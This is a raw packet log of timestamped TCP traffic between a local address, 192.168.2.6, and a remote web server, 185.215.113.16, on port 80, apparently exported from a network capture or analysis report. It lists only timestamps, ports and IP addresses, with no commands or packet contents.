Dec 19, 2024 10:10:11.746896982 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.746941090 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.746952057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.746994972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.749068022 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.749113083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.749169111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.749213934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.751245975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.751262903 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.751290083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.751305103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.753354073 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.753401041 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.753457069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.753631115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.755470991 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.755527973 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.755578041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.755624056 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.757755041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.757801056 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.757828951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.757872105 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.759902000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.759949923 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.760247946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.760293007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.761662960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.761708021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.761733055 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.761776924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.763451099 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.763494968 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.763555050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.763595104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.765407085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.765450954 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.765508890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.765553951 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.767379999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.767419100 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.767435074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.767461061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.769345999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.769391060 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.769440889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.769484043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.771389961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.771435976 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.771518946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.771562099 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.773215055 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.773260117 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.773386002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.773427963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.775058031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.775101900 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.775166988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.775212049 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.776968002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.777013063 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.777136087 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.777179003 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.778901100 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.778947115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.778999090 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.779042006 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.780852079 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.780895948 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.780997038 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.781040907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.782618999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.782661915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.782773018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.782819033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.784434080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.784478903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.784560919 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.784604073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.786339045 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.786382914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.786433935 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.786475897 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.788223028 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.788268089 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.788322926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.788362980 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.790096998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.790143967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.790210962 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.790255070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.792000055 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.792043924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.792105913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.792151928 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.793873072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.793920994 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.793977976 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.794023037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.795808077 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.795855045 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.795907974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.795952082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.797626972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.797668934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.797733068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.797775030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.799534082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.799578905 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.799631119 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.799673080 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.801433086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.801476002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.801518917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.801562071 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.803417921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.803462029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.803513050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.803555965 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.805278063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.805320978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.805370092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.805435896 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.807076931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.807101011 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.807121038 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.807135105 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.808938980 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.808983088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.809035063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.809079885 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.810888052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.810931921 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.810977936 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.811019897 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.812726021 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.812768936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.812800884 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.812844038 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.814553976 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.814598083 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.814704895 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.814753056 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.816468000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.816513062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.816641092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.816685915 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.818312883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.818358898 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.818424940 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.818469048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.820182085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.820226908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.820369959 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.820415020 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.822086096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.822129965 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.822166920 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.822207928 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.823935986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.823978901 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.913336039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.913383961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.913393021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.913423061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.913710117 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.913753986 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.913834095 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.913877010 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.915025949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.915067911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.915127993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.915169001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.916358948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.916400909 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.916513920 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.916558981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.917833090 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.917881012 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.917932034 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.917975903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.919018984 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.919061899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.919099092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.919142008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.920350075 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.920393944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.920485020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.920526981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.921669006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.921705961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.921710968 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.921746969 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.922895908 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.922940016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.922964096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.923007011 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.924204111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.924248934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.924334049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.924376011 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.925434113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.925483942 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.925555944 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.925600052 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.926719904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.926760912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.926817894 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.926856041 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.927975893 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.928016901 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.928132057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.928174019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.929209948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.929251909 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.929331064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.929372072 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.930396080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.930440903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.930506945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.930548906 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.931720972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.931736946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.931762934 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.931778908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.932869911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.932913065 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.932951927 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.932992935 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.934063911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.934108019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.934190035 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.934230089 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.935256004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.935301065 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.935354948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.935399055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.936475039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.936517000 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.936549902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.936592102 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.937663078 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.937705040 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.937736988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.937779903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.938833952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.938877106 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.939007998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.939049959 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.940037012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.940082073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.940148115 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.940190077 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.941234112 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.941277981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.941360950 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.941405058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.942408085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.942449093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.942523956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.942564964 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.943492889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.943536043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.943604946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.943645954 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.944648027 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.944689035 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.944788933 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.944830894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.945878029 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.945921898 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.945988894 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.946031094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.946953058 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.946997881 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.947077036 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.947118998 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.948050022 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.948092937 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.948173046 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.948215008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.949218988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.949261904 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.949265957 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.949307919 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.950309038 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.950355053 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.950500011 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.950544119 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.951469898 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.951519966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.951658010 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.951704979 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.952615976 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.952665091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.952709913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.952749014 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.953736067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.953782082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.953865051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.953907967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.954888105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.954936981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.954989910 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.955034018 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.956084967 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.956135035 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.956176043 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.956221104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.957184076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.957233906 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.957312107 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.957354069 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.958281994 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.958331108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.958374977 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.958415985 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.959408045 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.959458113 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.959605932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.959649086 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.960537910 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.960586071 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.960640907 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.960684061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.961627960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.961683035 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.961726904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.961771011 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.962910891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.962958097 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.962963104 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.962995052 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.963973999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.964025974 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.964431047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.964482069 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.965142012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.965189934 CET	80	49860	185.215.113.16	192.168.2.6
